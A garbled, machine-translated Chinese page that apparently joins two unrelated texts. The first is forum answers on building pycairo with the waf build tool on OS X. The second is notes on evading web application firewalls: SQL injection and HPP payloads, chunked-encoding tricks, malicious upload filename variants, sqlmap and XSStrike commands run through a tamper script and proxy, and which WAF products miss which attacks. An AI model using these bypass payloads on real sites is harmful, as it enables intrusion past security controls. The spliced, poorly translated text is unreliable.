下面是它如何工作的之后python waf configure未能找到Python.h,我看着通过位于build_directory config.log文件,发现失败的真正为架构。 WAF的脚本试图建立一个简单的源文件中的i386架构的CPython调用。它没有这样做,我的python被建为x86_64架构。
我猜,你可以重建Python作为一个通用的二进制,我还没有试过。这是可能的,但是 CodeGo.net,打造x86_64架构。这里的如何。
我的设置:
$ python --version
Python 2.7.2
$ type python
python is /usr/local/bin/python
$ file /usr/local/bin/python
/usr/local/bin/python: Mach-O 64-bit executable x86_64
$ brew --version
0.8
Importrant:我的Python版本是专为在x86_64架构。请确保它也是执行下面描述的步骤之前,你的情况下。
冲泡代表你,而不是它的芬克或使用MacPorts,以便下面的步骤来为你工作。
现在,安装cairo和pycairo我做到以下几点:brew install cairo(版本1.10.2截至今天)
找pycairo来源Python 2.x的(如果你得到一个快照,它是py2cairo,而pycairo现在需要Python 3.x的)。从主分支源(提交f3435910d8f5365b45ebd4216f4043383c9e3e19)
开wscript在您选择的编辑器,找到该行env = ctx.env在函数configure并在它下面添加下面一行env.append_unique('CFLAGS', ['-arch', 'x86_64'])保存文件
在你的终端上运行:export CC=/usr/bin/gccexport PKG_CONFIG_PATH=/usr/local/Cellar/cairo/1.10.2/lib/pkgconfig/重要:后者路径将只为你,如果你通过安装cairo工作
然后运行在pycairo的INSTALL文件中描述:python waf configurepython waf buildpython waf install这应该这样做。如果它不为你工作,我认为这是更好地提高pycairo邮件列表上的主题(如果有的话)。
2.
对于后面这一点,我能得到py2cairo安装在OSX狮子一个稍微不同的方法,基于llimllib的链接。希望这会有所帮助:
python waf clean
export PYTHONPATH=/Library/Frameworks/Python.framework/Versions/2.7/
export LD_LIBRARY_PATH=/Library/Frameworks/Python.framework/Versions/2.7/:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=/Library/Frameworks/Python.framework/Versions/2.7/lib:$LD_LIBRARY_PATH
export LINKFLAGS='-search_dylibs_first -L /Library/Frameworks/Python.framework/Versions/2.7/lib/'
export ARCHFLAGS='-arch x86_64'
export CC=/usr/bin/gcc-4.2
export PKG_CONFIG_PATH=/usr/local/Cellar/cairo/1.10.2/lib/pkgconfig/
python waf configure --prefix=$PYTHONPATH
python waf build
python waf install
3.
android的步骤差不多的作品。
人们需要(从llimllib):export ARCHFLAGS='-arch x86_64在步骤5,然后python waf install可以
1、速度流量问题2、工具的指纹被识别
3、工具的检测Poc或Payload
1、SQL注入&文件上传绕过
2、XSS跨站&其他漏洞绕过
3、HPP污染&垃圾数据&分块等
SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
关键字替换
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12
更换提交方式:
POST id=-1 union select 1,2,3--+
模拟文件上传 传递数据
分块传输:更改数据请求格式
https://github.com/c0ny1/chunked-coding-converter
HPP参数污染:id=1/* &id=-1%20union%20select%201,2,3%23 /
文件上传:换行解析&垃圾溢出&%00干扰&=符号干扰&参数模拟
filename=a.php
filename="a.php
filename="a.php%00"
垃圾数据filename="a.php"
无限filenamefilename="a.php"
filename=="a.php"
filename="name='uploadfile.php"
filename="Content-Disposition: form-data.php"
filename=="a.ph
p"
python sqlmap.py -u " http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2 " --random-agent --tamper= rdog.py --proxy=" http://tps118.kdlapi.com:15818 "
格式替换
https://github.com/s0md3v/XSStrike
python xsstrike.py -u " http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit " --proxy
txt= y)&submit=%E6%8F%90%E4%BA%A4
文件包含:没什么好说的就这几种
..\ ..../ ...\等
安全狗:
注入 xss 文件上传拦截
rce 文件包含 等其他不拦截
宝塔:
注入 上传拦截
rce 文件包含 xss等其他不拦截
其中拦截的是关键字
aliyun
拦截的CC速度 和 后门 信息收集和权限维持阶段拦截
漏洞利用 他不拦截 默认的版本(升级版本没测试)
WAF PHP环境 JAVA不支持